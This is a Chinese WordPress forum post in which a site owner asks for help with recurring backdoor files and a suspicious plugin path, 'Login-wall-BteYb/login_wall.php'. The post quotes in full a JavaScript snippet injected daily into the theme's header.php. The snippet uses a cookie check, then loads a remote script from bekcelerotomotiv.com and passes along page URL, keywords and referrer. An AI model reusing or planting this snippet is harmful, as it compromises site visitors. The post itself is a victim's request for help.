关于后门的苦恼。。另外问下login_wall.php这是个啥文件。

问题1：

WP程序里面多了很多PHP后门文件，部分WP文件被修改。删除之后又会重新生成。
经过我反复尝试，包括部分插件的删除安装，代码的官方覆盖等等方法。
现在只剩下一个问题。每天我的主题 Header.php文件里都会被插入一段代码（还是没法解决），其他的文件倒不会再被修改了。
（FTP看是没有修改时间变更，应该是代码自动插入）
代码如下：

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://bekcelerotomotiv.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'J18171' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

问题二：我搜索数据库，发现有个地方引用这个插件
/wp-content/plugins/Login-wall-BteYb/login_wall.php
第一，这个插件我没有装过，在我的插件中确实自己出现过，后来我清理掉了，数据库怎么还会有这个。
第二，这是个啥玩意，我百度发现没有相关的问题，只有很多不能访问的WP站点报错路径中会有这个出现。
求高手解答。如果能搞定。我发个大红包也可以啊。

关于后门的苦恼。。另外问下login_wall.php这是个啥文件。

8 个回复

发起人

相关问题

问题状态

网站相关

联系合作

关注我们

友情链接

WordPress社区内容许可

关于后门的苦恼。。另外问下login_wall.php这是个啥文件。

与内容相关的链接

8 个回复

发起人

相关问题

问题状态

网站相关

联系合作

关注我们

友情链接

WordPress社区内容许可